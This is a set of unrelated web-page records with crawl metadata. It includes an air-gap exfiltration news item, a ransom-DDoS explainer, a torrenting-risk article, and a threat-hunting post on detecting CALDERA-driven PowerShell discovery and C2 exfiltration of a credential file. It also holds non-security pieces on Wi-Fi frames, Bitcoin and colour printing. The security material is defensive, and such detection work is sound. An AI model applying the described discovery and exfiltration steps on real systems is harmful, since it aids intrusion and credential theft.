What an interesting profession! I learn something new every day. | <urn:uuid:3a9830f1-938a-4d64-aaad-52d2efa8e2e3> | CC-MAIN-2022-40 | https://www.itjungle.com/2006/10/18/fhg101806-story01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00555.warc.gz | en | 0.77616 | 1,102 | 2.578125 | 3 |
If you have an air-gapped computer, you probably think you’re safe. You may think that barring physical access to the machine, no hacker could possibly steal the data on that machine. Unfortunately, you’d be incorrect.
Security researchers from the Ben Gurion University of the Negev, in Israel, have discovered a new way of stealing data using power lines. While that may sound like science fiction, it’s actually real and a genuine threat, even to computers thought to be highly secure.
If you’re not familiar with the term, an air gapped computer is one that is isolated from local networks and the internet. Because it’s not connected to anything, these machines have long been regarded as the ultimate in data security and are used by governments and corporations to store their most sensitive data.
Here’s what the researchers had to say about their discovery:
“As a part of the targeted attack, the adversary may infiltrate the air-gapped networks using social engineering, supply chain attacks, or malicious insiders. Note that several APTs discovered in the last decade are capable of infecting air-gapped networks (e.g. Turlal, RedOctober and Fanny).
However, despite the fact that breaching air-gapped systems has been shown feasible, the exfiltration of data from an air-gapped system remains a challenge.”
Up until now, anyway.
The researchers have dubbed this new technique “PowerHammer,” and it accomplishes the task of siphoning data from air-gapped systems by creating fluctuations in the flow of electrical current to create a Morse-code-like pattern, which can be used to create a simple binary system.
That accomplished, the only other thing that’s needed is a piece of hardware to monitor the flow of electricity as it passes through power lines and then, decode the signal. According to the research team, data transfer speeds of up to 1000bps can be achieved.
This should scare the daylights out of anyone in data security. | <urn:uuid:c5ecfacd-512c-4607-beb0-014407889d89> | CC-MAIN-2022-40 | https://dartmsp.com/can-computer-data-be-stolen-through-power-lines/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00555.warc.gz | en | 0.938091 | 431 | 3.078125 | 3 |
With the advancement of science and technology, technological innovation has also grown, resulting in new devices and devices. No matter how big or small your business is, technology provides intangible and tangible benefits to make them profitable and meet the growing needs and requirements of customers. Technological innovations affect the efficiency, culture, and relationship between employees, customers, suppliers, and customers. The nature and quality of the technology used to affect the security of confidential business information.
Due to administrative tasks such as inventory, accounting, and file keeping, large and small businesses rely on computers to perform their administrative tasks. The birth of the Internet and online social networking sites has significantly reduced the cost of doing business. It also makes it easier for companies to use Six Sigma management methods. Some companies have switched to outsourcing because of the associated low cost, rather than hiring their own employees. Due to the huge impact of technological innovation in companies, it is impossible for them to live with them.
Customers are the blood of the company. It is a fact that operations depend solely on their customers to survive. Therefore, it is important that companies not only value their customers but also engage in a relationship with them to ensure loyalty. Only then can companies be sure to repeat an exchange. Companies can only achieve this by providing the highest quality of customer service. Technology has changed the way companies interact with their customers. There are a number of technological tools that improve customer service. Companies use technology because it improves efficiency. This is also a very cost-effective way to solve customer service issues such as complaints, inquiries and online orders. Through technology, companies have turned to their customers.
Some of the technological tools companies can use to improve customer service are:
- Social Network Networks: Create a virtual community between the company and its customers. Questions, inquiries, and complaints can be sorted very quickly via this platform.
- Websites: Before social networks, this was the first contact between companies and their customers. Nowadays it is used as a marketing tool.
- E-mail: E-mail is the traditional way companies communicate with their customers. This is used to inform customers about a new product / improved product; Use it as a channel for marketing campaigns; or any change within the organization. This is the best tool to achieve loyalty.
All companies realize that they do not think about the customer and can not think about marketing. One depends very much on the other. Companies use technology to improve marketing strategies. You do it the following way:
Use marketing strategies that are in line with customer expectations. This can only be achieved through the use of databases and analysis tools. Some tools that may be useful to your business are reviewed here, take a look at these: project profit academy review & Digital Worth Academy review.
Automation of most services offered by companies results in greater efficiency and effectiveness. Companies have automated most of the services that concern customers. Inquiries and questions are handled more efficiently by the software. Online shopping and commerce have been automated by electronic commerce. The websites were used to automate the first contact between the company and its customers. Customers can access more information about the business through their website.
Technology can be used to create or break a business. Social networks are the most dangerous if they are not used properly. A mistake can lead to the collapse of huge companies. Social media networks are platforms for exchanging information between the online community. Companies use social networks to create brands and interact with their customers. The trend of customer service is towards community-based technology tools like social networks.
Companies should try to build good relationships with their customers regardless of the route they are using. A dissatisfied customer is worse than a forest fire. Most customer service technologies can be used concurrently with marketing tools.
Advantages of technology for businesses:
- Relationships with customers. Technology influences the way companies communicate and build relationships with their customers. In a rapidly changing commercial environment, it is important that they interact regularly and quickly with customers to gain their trust and win customers. With the use of the Internet and social online networks, companies interact with consumers and answer all their questions about the product. Creating effective communication with clients not only creates a good relationship with them but also creates a strong public image. It enables commercial companies to reduce and reduce carbon emissions.
- Business operations. By leveraging technology innovation, entrepreneurs and entrepreneurs can better understand their cash flow, manage their inventory costs, and save time and money.
- Corporate culture The technology enables employees to communicate and interact with other employees in other countries. It creates a clique and prevents the emergence of social tension.
- Security Modern security equipment enables businesses to protect their financial information, business confidential information, and decisions.
- Research opportunities. It offers a place for studies to stay one step ahead of the competition. It enables companies to virtually travel to unknown markets. | <urn:uuid:b9ce0d82-91ef-45d1-b1d9-c510f02c2b12> | CC-MAIN-2022-40 | https://www.intellinet-tech.com/business-and-its-relationship-with-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00755.warc.gz | en | 0.956806 | 982 | 2.5625 | 3 |
Below shows a frame format of a Data Frame. (source IEEE 802.11-2012 standard)
The content of the address fields of data frames are dependent upon the values of the To DS and From DS fields in the Frame Control field and whether the Frame Body field contains either an MSDU (or fragment thereof) or an entire A-MSDU, as determined by the A-MSDU Present subfield of the QoS Control field.
The content of the address fields is shown in below table (source IEEE 802-11 2012 Table 8-19). Where the content of a field is shown as not applicable (N/A), the field is omitted. Note that Address 1 always holds the receiver address of the intended receiver, and that Address 2 always holds the address of the STA that is transmitting the frame.
Source Address (SA) : This is the address where the frame is sent from.
Destination Address (DA) : This is the address where the frame is being sent to.
Transmitter Address (TA) : This is the address of the station that is transmitting the RF frame.
Receiver Address (RA) : This is the address of the station that is receiving the RF frame.
Basic Service Set Identifier (BSSID) : This is the basic service set ID of the AP.
Typically all 4 address fields are used only in Wireless Distribution system (WDS) or Mesh AP back-haul scenarios. Below shows a Wireless bridge topology where you can see all the 4 address fields are being used.
Address 1: RA – 64:ae:0c:93:75:90 (AAP2 802.11 BSSID for SSID-MGMT)
Address 2: TA – a4:0c:c3:1a:ee:60 (AAP1 802.11 BSSID for SSID-MGMT)
Address 3: DA – c8:f9:f9:d7:3b:a7 (7965 MAC address)
Address 4: SA – 00:1a:e3:a7:ff:40 (vlan 2 gateway MAC in C3750)
For data frames of subtype Null (no data), CF-Ack (no data), CF-Poll (no data), and CF-Ack+CF-Poll (no data) and for the corresponding QoS data frame subtypes, the Frame Body field is null (i.e., has a length of 0 octets); these subtypes are used for MAC control purposes.
For data frames of subtypes Data, Data+CF-Ack, Data+CF-Poll, and Data+CF-Ack+CF-Poll, the Frame Body field contains all of, or a fragment of, an MSDU after any encapsulation for security.
For data frames of subtypes QoS Data, QoS Data+CF-Ack, QoS Data+CF-Poll, and QoS Data+CF-Ack+CF-Poll, the Frame Body field contains an MSDU (or fragment thereof) or A-MSDU after any encapsulation for security.
The maximum length of the Frame Body field can be determined from the maximum MSDU length plus the length of the Mesh Control field (if present) plus any overhead from encapsulation for encryption (i.e., it is always possible to send a maximum length MSDU, with any encapsulations provided by the MAC layer within a single data MPDU). When the frame body carries an A-MSDU, the size of the frame body field is limited by:
— The PHY’s maximum PLCP service data unit (PSDU) length
— If A-MPDU aggregation is used, a maximum MPDU length of 4095 octets
The duration value calculation for the data frame is based on the rules in 9.7 that determine the data rate at which the control frames in the frame exchange sequence are transmitted. If the calculated duration includes a fractional microsecond, that value is rounded up to the next higher integer. All STAs process Duration/ID field values less than or equal to 32 767 from valid data frames (without regard for the RA, DA, and/or BSSID address values that might be present in these frames) to update their NAV settings as appropriate under the coordination function rules.
1. CWAP Official Study Guide – Chapter 6
2. IEEE 802.11-2102 Standard | <urn:uuid:dbc852da-90b6-4beb-9791-4ba2621b4cb5> | CC-MAIN-2022-40 | https://mrncciew.com/2014/11/03/cwap-data-frame-address-fields/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00755.warc.gz | en | 0.821531 | 941 | 2.75 | 3 |
Wow, things change fast in the internet age. One day you’re making a phone call on a brick-like cellphone and the next day, it seems, you’re having video chats with your friends halfway around the world.
One day, you’re turning a knob to change a TV channel and the next day you’re talking to your TV set. Yet, there may be no better example than Bitcoin of how fast technology changes.
It’s so new to most of us that it’s not uncommon to hear, “What is Bitcoin?” “What is cryptocurrency?”
Of course, Bitcoin has been on everyone’s tongue lately because its value soared to incredible heights seemingly overnight. In fact, “Bitcoin billionaire” became a hot new phrase.
A unit of Bitcoin last year went from being worth $800 to more than $19,000, according to “Money Magazine.” Wow! But the floor fell out, too, dropping roughly 30 percent last month.
For most of us, though, Bitcoin is simply a currency that you can use like real money. Keep reading for three ways that you can turn Bitcoin into dollars.
What is Bitcoin?
Bitcoin is a digital currency that uses encryption to protect your money, much more so than paper money and coins. It also allows you to be somewhat anonymous when using it.
You may remember, for example, that Apple got into a heated exchange a few years ago with the U.S. government over encryption and a terrorist’s iPhone. Apple and other companies use encryption to protect your privacy with a password and scrambled data, so no one can see your information except you.
3 ways to use Bitcoin as money
So, how can you use a digital currency? It’s fairly easy to start using Bitcoin to make purchases.
If you’re like most people, you take out a credit card or debit card to make most of your purchases. Heck, these days there are banks that don’t even accept cash because of crimes like money laundering.
You may even be paying your bills digitally these days, whether you use a service like PayPal to transfer funds or your bank’s bill-pay site. Cash is still cool, but it’s a bit Old School.
You can now use a debit card to access your cryptocurrency and use it just like you would use any other payment card. There are several debit cards available, including Bitpay and CoinJar.
Many of these cards have a partnership with Visa or Mastercard. So, spend away.
There are websites like Coinbase and CoinJar where you can buy cryptocurrencies, including Bitcoin, Ethereum and Litecoin. You can also sell your cryptocurrency on these sites.
Perhaps the best part is that you can link your cryptocurrency to your bank account. So, the next time Bitcoin takes off, you can cash out. (Are you the next Bitcoin billionaire?)
You’ve probably started seeing Bitcoin ATMs where you live. Although, you may have wondered how you would use one.
For starters, you can buy Bitcoin by depositing cash into the ATM. Second, you can cash out your cryptocurrency and turn it into real cash.
Note: Beware! There can be hefty fees to use these ATMs.
12 questions you’re too embarrassed to ask about Bitcoin
Have you ever seen that funny “Today Show” clip where Katie Couric is wondering what this new thing called “email” is? It’s funny because it’s hard to remember life before email.
These days, you might be feeling like Couric did all those years ago – confused by terms like “Bitcoin” and “cryptocurrency.” Join the club! | <urn:uuid:f52b17c6-183c-4f0d-9eaf-d1da341b5a78> | CC-MAIN-2022-40 | https://www.komando.com/money-tips/how-to-convert-bitcoin-to-cash/438841/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00755.warc.gz | en | 0.934299 | 801 | 2.703125 | 3 |
A Brief History of Nineteenth Century Color Printing
We take color printing for granted in the 21st century, but we stand on the shoulders of giants, owing a debt of gratitude to artists and printers of the nineteenth century who brought exciting innovations to processes relatively unchanged since the Renaissance.
They Led the Way
Hand-colored copperplate engraving. Expensive and time consuming, copper plate engraving produced black outline illustrations which were then filled in with color by hand. This method was well suited for natural history and botanical illustrations, like this example: Curtis’s Botanical Magazine, remarkably continuously published since 1787.
Woodcutting. The very earliest printing process was achieved by cutting away unwanted parts of a piece of wood. Ink was rolled onto the woodcut and the design transferred to the paper. The earliest color example is The 1457 Mainz Psalter.
Lithography. Invented in Germany in 1798, lithography involved applying oily inks to limestone, and was the first innovation in printing since the fifteenth century. By the 1880s, chromolithography was widely used in magazines and advertising, but would soon be replaced by photographic processes in the 20th century. A good example is Victoria Regia; Or, The Great Water Lily of America by John Fisk Allen, 1854.
Nature printing. This process involved embedding a specimen (a leaf or butterfly, for example) into a lead plate and applying color. Only a few books were actually printed; the most successful being As Nature Shows Them: Moths and Butterflies of the United States,, by Sherman F. Denton, 1900.
To learn more about the history of color printing, visit Color Printing in the Nineteenth Century.
We’ve Come a Long Way Since Then
Thankfully, you won’t need to get out your carving knife and slice away at a chunk of wood to get stunning color printing results for your 21st century office. Just contact the color printing experts at 1-800 Office Solutions Technologies today! | <urn:uuid:ae45cd8d-a9e2-4077-b292-125c66a5324a> | CC-MAIN-2022-40 | https://1800officesolutions.com/a-brief-history-of-nineteenth-century-color-printing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00755.warc.gz | en | 0.947983 | 416 | 3.6875 | 4 |
More than a week after Iran said it had been the victim of another cyber attack by foreign adversaries, computer security experts around the globe are voicing their skepticism about the country’s claims.
After the Stuxnet incident last year, Iran claims it was recently hit with another cyber attack. The Iranian government said it suspected a virus called “stars“ being responsible for the attack, but did not share any information on the malware or the damage it might have caused.
“If it is real or a hoax, it is impossible to tell,“ he said. “There is a possibility that they are working with some anti-virus company under a nondisclosure agreement for analysis/remediation, something that is not uncommon.“
Even if the “stars“ virus was a genuine foreign attack, it could be created to extract information rather than do physical damage.
“It sounds more like cyber espionage than cyber sabotage,“ said Mikko Hypponen, chief research officer at F-Secure. “Cyber espionage happens all the time. Cyber sabotage doesn't.“ | <urn:uuid:04a3a165-2dc4-4b0c-93e2-f0bd02d2f4cf> | CC-MAIN-2022-40 | https://blog.executivebiz.com/2011/05/experts-doubt-irans-claims-of-being-cyber-attacked/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00755.warc.gz | en | 0.968872 | 232 | 2.640625 | 3 |
Torrenting is the act of downloading many small bits of files at the same time from different sources – it’s essentially crowd sourcing for media content. While it can seem safe under the camouflage of the enormous World Wide Web, torrenting files can be a risky endeavour and could end up getting you into trouble that you might not even realise. While the underlying BitTorrent protocol and network is not in itself illegal, the bulk of content shared via torrents are made up of files that potentially violate copyright holders’ rights. Torrenting is popular and decentralized, so it’s tempting to believe there are no consequences.
So be warned: without taking necessary precautions, careless torrenters could be in for a rude awakening. The days of high-profile lawsuits in which Hollywood studios sued college students for tens of thousands of dollars might be over, but make no mistake: copyright holders are still waging a war on piracy behind the scenes.
Torrenters can run into trouble in three main ways: legal settlements, ISP penalties, loss of privacy, and infection by virus or malware. The peer-to-peer BitTorrent network relies on users who have downloaded a file to subsequently upload it, which exposes them several vulnerabilities. Here are some dangers of torrenting to bear in mind:
If you’re torrenting illegally, whether you realise it or not, there is a chance you could get chased for copyright infringement.
Rarely does a Hollywood movie studio directly sue individuals for downloading their latest release without permission anymore. This was a common scare tactic that proved ineffective to stem the growth of BitTorrent a decade ago. Instead, the legal front was taken on by entities known as copyright trolls.
A copyright troll gets permission on behalf of the copyright holder to take legal action against people who illegally download media. The BitTorrent protocol is built in such a way that when a device connects to a torrent, it can see the IP addresses of all the other devices connected to that torrent. Everyone who is uploading or downloading that file can be targeted by a copyright troll.
The IP addresses can be traced back to internet service providers. The copyright trolls send a list of IP addresses and settlement letters to the ISPs, who in turn forward those settlement letters to their customers.
These settlement letters typically ask for a few thousand dollars if the receiver pays immediately, or else face a court battle that could cost them tens of thousands. Hundreds or thousands of these letters can be sent, and the copyright troll only needs the scare tactic to work a handful of times to make their efforts worth it.
However, courts have ruled that IP addresses do not constitute identities, so the best course of action to take if one receives a settlement letter is to ignore it. The letter most likely won’t have a name on it. If the troll receives a response, it will have an identity, which gives it more leverage.
Despite this, If you do get a letter, you know for sure you’re torrenting illegally, so stopping is the best advice; and should the situation escalate, it’s time to seek professional legal help.
Unless connected to a VPN or some other means of encryption, all of the internet traffic can and likely will be monitored by a user’s internet service provider. Internet service providers in the US are usually in league with copyright holders, don’t want to be held liable for privacy, and want to save bandwidth. For these reasons, they frown on torrenting, sometimes whether it’s legal or not.
If an ISP catches one of its customers torrenting, it’s common for them to start by sending a nasty letter. If that doesn’t work, an ISP could resort to bandwidth throttling, fines, or even account suspension and termination. Bandwidth throttling restricts the speed of an internet connection. Sometimes download speed is only restricted on certain ports (the ones used by a BitTorrent client), but some ISPs restrict all traffic.
Malware and viruses
Torrents are common sources of malware and viruses. This is especially true of software and games, which must be installed and executed. Always run virus scans and read through comments to prevent infection.
A good antivirus is key here. Some torrenters will post the results of a virus scan in the comments section of a torrent’s web page for others to see. They can’t always be trusted, however, as false positives are common and no antivirus is perfect. It’s always better to run your own scans before opening a file.
The IP addresses for every device connected to a torrent are visible to everyone else. IP addresses can be used by advertisers, hackers, and even law enforcement to target individual users.
So if you want to keep you privacy and data protected from the various threats emanating from p2p networks, you should use the entire arsenal of computer protection: latest updates for the operating system installed on your device, a strong anti-virus security suite, and encryption of your internet connection, these are the must-have things while torrenting. VPNs will help with the latter to mask your activities but they’re not foolproof with logjams, kills switch and DNS leakage common torrenting hazards and it pays to look around to find the best providers.
Popcorn Time uses torrents
Popcorn Time streams TV shows and movies in a slick, easy to use app. Many users might not even realize that video is streamed directly from torrents. Once Popcorn Time starts downloading a video to your computer, it can also start uploading it to other users.
It makes no difference to an ISP or a copyright troll whether you use Popcorn Time or ThePirateBay to watch your shows–they both constitute a copyright violation.
Some torrents carry greater risks than others
Newer and more popular releases tend to be watched more closely by copyright trolls than other torrents. A general rule of thumb is movies within 60 days of their DVD and Blu-Ray release are more heavily monitored. This is the period during which movies and TV shows make the majority of their profit.
Popular torrents give copyright trolls a greater range of IP addresses to target, so they’re a better hunting ground for victims. Don’t be tempted to jump on the bandwagon and download the most popular torrents.
Don’t let Netflix VPN ban drive you to illegal torrenting
Netflix users outside of the US are now prohibited from using a proxy to access TV shows and movies that aren’t available through the service in their own countries. Shortly after the company’s global rollout, it began blocking proxy connections no matter where they originated. The purpose is to honor content licensing agreements with copyright holders, but the result was many Netflix subscribers being stuck with a smaller selection of shows.
Unsatisfied with the reduced catalog, many users resort to torrents to fill the gaps. But know that not all VPN services have surrendered to Netflix’s new policies. Some VPNs can still access US Netflix and other content limited to specific countries. Unlike torrenting copyrighted material, bypassing a geo-lock with a VPN is not illegal. Certain Smart DNS proxy services are offer alternate, viable workarounds and are also perfectly legal.
Whether you are torrenting or bypassing the Netflix firewall, a VPN is always a good idea.
Use a VPN
Don’t pirate. That’s the simplest way to avoid paying settlements and suffering ISP penalties. You can find a list of free and legal torrenting sites here. But even if you think what you’re downloading is within the law, the best way to avert these risks is to use a VPN.
Short for virtual private network, a VPN encrypts all of a device’s internet traffic and routes it through a location of the user’s choosing. This prevents ISPs from deciphering traffic and masks the device’s IP address so that copyright trolls can’t trace it back. | <urn:uuid:809df77b-ef31-49a7-b316-76e8dea9cd31> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/torrenting-know-risks-take/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00755.warc.gz | en | 0.933088 | 1,649 | 2.515625 | 3 |
Thought leadership. Threat analysis. Cybersecurity news and alerts.
More and more hackers are using distributed denial-of-service (DDoS) attacks to hold businesses to ransom.
In June 2021, the Canadian Centre for Cyber Security issued an alert to raise awareness of increased DDoS extortion activity. One notable case occurred in September of that year, with ITWorld Canada reporting that a voice-over-IP provider in Canada had been targeted.
The perpetrator was believed to have demanded one bitcoin (equal to around $45,000) as payment to end the assault. Numerous other companies have been hit since.
With ransom DDoS incidents becoming more common, it’s crucial that organizations understand how serious this threat is, how it could affect them, and what defensive measures they can use to stay safe.
But before we explore what a ransom DDoS attack is and how you can stop it, we’ll cover the basics.
What is a DDoS Attack?
A DDoS attack floods a specific network, server, website, or application with an overwhelming amount of traffic. This disrupts the normal flow of traffic and prevents the target from operating as it should.
Perpetrators tend to use botnets to launch DDoS attacks. A botnet is a network comprising many connected systems, all of which have been infected with malware, to generate disruptive traffic. These devices may be computers, IoT (Internet of things) gadgets, or mobile devices.
A hacker can leverage these “zombie” systems to attack their target with enough traffic to cause serious problems. Attackers may aim to:
But with ransom DDoS attacks, hackers are driven more by greed than anything else.
What is a Ransom DDoS Attack?
A ransom DDoS attack (often referred to as a RDDoS attack) is essentially the same, but with a few key differences. The attacker’s goal is to extort money from the target through threats and even brief demonstrations of their power.
A hacker may launch a DDoS attack against a business then contact the victims to demand payment. They will expect the target to pay the ransom, and if they remain unpaid, the attacker will continue the DDoS assault.
Alternatively, hackers may threaten the target before they begin the attack. Their objective will be to inspire panic in the potential victims and receive money without needing to act.
However, an inexperienced or unequipped perpetrator may lack the resources or knowhow to follow through on their threat. In this case, an organization could emerge from the incident unscathed even if they refuse to pay the ransom.
How Does a Ransom DDoS Attack Disrupt Businesses?
A ransom DDoS attack could disrupt your business in various ways, assuming the perpetrator launches the attack instead of simply issuing a threat.
Preventing an attack, and being prepared to handle one just in case, is vital to reduce your risk of experiencing these issues.
What Can You Do To Prevent a Ransom DDoS Attack?
Keep the following measures in mind to help prevent a ransom DDoS attack against your organization:
Refuse to Pay the Ransom
Your first instinct may be to pay the ransom, but you have no way of knowing whether that will stop the attack. It may continue, or the perpetrator could retarget your business again because they know you’re likely to pay a second time.
Train Employees to Handle Threats Responsibly
Educate your workers on what a ransom DDoS attack involves, how they usually unfold, and what actions to take if they receive a threatening message. They should know who to report an incident to and how to recognize early signs of an attack.
Look Out for Warning Signs of Impending Attacks
Common early signs of a DDoS attack include:
These could indicate other problems, too, such as outdated equipment. However, it may be best to have any of these signs investigated by cybersecurity specialists just in case.
Ensure Your Security Measures are Updated and Effective
If you haven’t updated your firewalls and other IT security measures in a while, review them to identify potential weaknesses. Outdated cybersecurity software may lack the features to protect your business.
Work with Professional Cybersecurity Specialists
Reviewing, updating, and testing your cybersecurity setup is complicated. But it’s critical to reduce your risk of being affected by a ransom DDoS attack. For many companies in Canada, the simplest way to combat threats is to work with a team of cybersecurity professionals.
At The Driz Group, we’re dedicated to providing unparalleled cybersecurity solutions for businesses in all sectors.
Our experienced, trained, reliable team will perform a comprehensive IT audit and vulnerability assessment to accurately determine your unique security requirements. And we’ll implement the best security available to always defend your organization.
Start protecting your business — schedule your free consultation with The Driz Group today.
Steve E. Driz, I.S.P., ITCP | <urn:uuid:ac7ec303-b415-46ab-8d1c-5253d804767e> | CC-MAIN-2022-40 | https://www.drizgroup.com/driz_group_blog/archives/02-2022 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00155.warc.gz | en | 0.941323 | 1,047 | 3.078125 | 3 |
Malware of the Day – Malware Techniques: Discovery and Information Gathering
What is Malware of the Day?
“Malware”: Various Payloads Delivered via CALDERA
Traffic Type: Generic
Connection Type: HTTP, TCP
C2 Platform: CALDERA
Origin of Sample: https://github.com/mitre/caldera
Host Payload Delivery Method: Powershell
Target Host/Victim: 10.0.0.60 – Windows 10 x64
C2 Server: 18.104.22.168
Beacon Timing: N/A
Today our focus is on identifying the anomalous network behavior that results from an adversary snooping around our network. We are using AC-Hunter/RITA and BeaKer as our intrusion detection tools to examine traffic generated by the CALDERA software. CALDERA is an open-source C2 framework that makes it incredibly easy to automate and/or manually run a variety of exploits on a remote system.
In the early stages of a cyber attack it is essential for the adversary to get to know the layout of the digital landscape they have infiltrated. This includes discovering accounts and domain controllers, learning the details of the target’s network configuration, finding injectable processes, etc. Armed with this information, an adversary can make more educated decisions about how to act during the remainder of the engagement.
This phase of an attack and the techniques therein fall under the MITRE ATT&CK category of Discovery. The adversary will often use native operating-system tools (i.e. Powershell) to collect information and explore what they can control and exploit on the compromised host or within the surrounding network.
Here are several examples (among many) of what one can learn from some simple Powershell commands.
Discovering what antivirus software is running on the system:
This information helps the adversary with defense evasion and deciding which further exploits are most likely to be successful.
Permissions group discovery:
Gpresult displays information about the group policy objects to the machine and user. It displays details such as last time group policy was applied, which domain controller it ran from, and which security groups the user and computer is a member of. This information is valuable to an attacker since they can make better informed decisions about how to move around the network.
How can we tell if an adversary is engaging in this type of behavior?
Fortunately for us, in order for the adversary to obtain and make use of any information, they have to get that data from a compromised system over to their servers, which leaves a digital footprint. This most often happens over the internet although sending in a spy with a bag full of USB drives is also possible.
The screenshot above is taken from AC-Hunter’s long connections screen. The top result shows a connection to an external IP that was open for just under 24 hours. There are several obvious factors that make this connection suspicious:
- The persistence of the connection does not resemble human activity. Most user-created connections will not last more than a few hours.
- The connection goes directly to an IP address that does not appear to have an associated domain name. Human made HTTP requests will almost always be to a domain rather than IP (there will also typically be a DNS request present for that domain).
Switching to the second view in the AC-Hunter Long Connections tab shows us the total time two hosts were connected (all connections combined). It also shows the total bytes transferred between the hosts:
The amount of data transferred between the hosts (140Mb) is another indicator that this connection should be further investigated. At this point we have identified a potential threat and we can perform further forensic analysis to determine what the adversary might have been doing.
Our open-source tool RITA can also be used for a similar analysis. The screenshot above shows the results from running the command:
rita show-long-connections database-name -H
If BeaKer (pictured above) is installed on the local system we can use it to see which processes on the host machines are responsible for the connection in question. There appears to be a single executable file which, in this case, must be the stager for the command and control channel. We also see several instances of Powershell on our machine connecting to the machine in question. While Powershell itself is a legitimate program, it is both easy and common for attackers to abuse it. Powershell exploits are especially convenient because it is often trusted and not deeply monitored by most antivirus programs.
So how do we bridge the gap between finding a malicious network connection to determining it was on a discovery mission and collecting system information?
This can be a bit tricky, or sometimes impossible, depending on the network protocol and encryption method of the data. Previously we saw that this connection used the HTTP protocol. Since HTTP is a plain text protocol and we have the packet capture, we might be able to figure out what exactly was being sent over the wire depending on if the payloads were encrypted prior to transport.
In the screenshot above, we opened the PCAP in Wireshark and then filtered for the IP in question and the HTTP protocol. In the highlighted request we see a file named “181475_credstuffuserpass.txt” was posted to the server. Taking a look at the other requests may give us a clearer picture of what the adversary was doing, but this task we leave to you, the threat hunter to complete.
We encourage you to download and use the PCAP files included in the next section to analyze these files independently using your preferred threat hunt platform to test your detection capabilities.
Because… PCAPs, or it didn’t happen. 😊
The following PCAP files are packet captures taken from the same lab environment over a one-hour time frame and a 24-hour time frame. The files were generated using Wireshark from the target host and include normal Windows OS traffic and normal network broadcast traffic. They have not been edited. The PCAPs are safe, standard PCAP files and do not include any actual malware.
CALDERA Discovery 1 Hour Capture
Size: 119.48 MB
SHA256 Checksum: 793622CCFCF2FA4788C93B327C874A8A80A5C02576F7BEE9F8FF574103B22A03
CALDERA Discovery 24 Hour Capture
Size: 240.92 MB
SHA256 Checksum: E81FD13ECDCA3E01235E683806115A5E3189EEDE4739709BFBF7A40B2AE190F0
Want to talk about this or anything else concerning threat hunting? Want to share how good (or not so good) other detection tools were able to detect this sample?
You are welcome to join our Discord server titled “Threat Hunter Community” to discuss topics surrounding threat hunting. We invite you to join our server here.
Interested in threat hunting tools? Check out AC-Hunter
Active Countermeasures is passionate about providing quality, educational content for the Infosec and Threat Hunting community. We appreciate your feedback so we can keep providing the type of content the community wants to see. Please feel free to Email Us with your ideas!
Hannah joined Active Countermeasures as an intern in 2020. She is currently a graduate student at the University of Utah. | <urn:uuid:60fc95f4-887d-4cbf-bba2-732b217f3971> | CC-MAIN-2022-40 | https://www.activecountermeasures.com/malware-of-the-day-malware-techniques-discovery-and-information-gathering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00155.warc.gz | en | 0.927356 | 1,594 | 2.65625 | 3 |
As the Industrial Internet of Things (IIoT) drives the production of connected devices, wireless and Ethernet-based technologies have become an important piece of the connectivity conversation. Entire industries are making digital transformations and it’s changing the way businesses operate. There are billions of IoT devices in service and development continues to ramp up. Recently, we’ve seen several wireless and Ethernet technologies headlines in the news.
Wireless and Ethernet News
By David Greenfield | Published on @automationworld
“We’ve tarBygeted a small scale, single-chip processing solution (to bring Ethernet to industrial edge devices) by reducing processor speed, memory and RAM size, reducing the interconnection complexity from processor to network interface, and reducing the pin count and complexity of the network interface,” said Weingartner. Essentially, “we’re bringing MAC into the PHY (the physical layer of the OSI model which connects a MAC to a cable), which is what Ethernet is all about. Doing this opens up possibilities not just for new implementations, but for brownfield applications as well.”
“What’s called dynamic charging foresees a future where vehicles charge themselves as they drive. Using coils embedded in roads, EVs would refuel as they stay in transit, creating their own self-perpetuating electrical loop. It’s similar to the way some mobile devices get charged.”
By David Chalupsky | Published on @
“For many years, Ethernet evolution was characterized by the “need for speed” as networks and data centers sought higher and higher throughput. But over time, Ethernet has found its way into applications unforeseen by the developers of the original specification, resulting in a broad and varied Ethernet ecosystem. Today the desire to bring the advantages of Ethernet into new applications necessitates a new approach where the needs of the application are considered first and foremost in defining new Ethernet incarnations.”
“The most promising of wireless power technology seems to be radio frequency. With its apparent lack of serious problems and its unique strengths, radio frequency has the greatest long-term potential to become the market’s leading source of wireless power to fuel the Internet of Things. No significant evidence exists depicting radio frequency as posing a threat to humans. The human body consists mostly of water and radio waves do not transmit energy through water. Radio frequency is also highly configurable. Devices sending and receiving radio frequency power can easily be equipped with regulators, enabling control of how much power will be emitted and received.” | <urn:uuid:f5e0a47a-6144-4d15-b1cd-10d217dd4c29> | CC-MAIN-2022-40 | https://www.freewave.com/wireless-and-ethernet-news/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00155.warc.gz | en | 0.941245 | 528 | 2.546875 | 3 |
Ask any IT manager and one of their primary concerns is security. The number and sophistication of attacks from both internal and external sources continues to grow, making IT security and risk mitigation full time jobs. Even then, many have commented that it isn’t if you will be breached, but when.
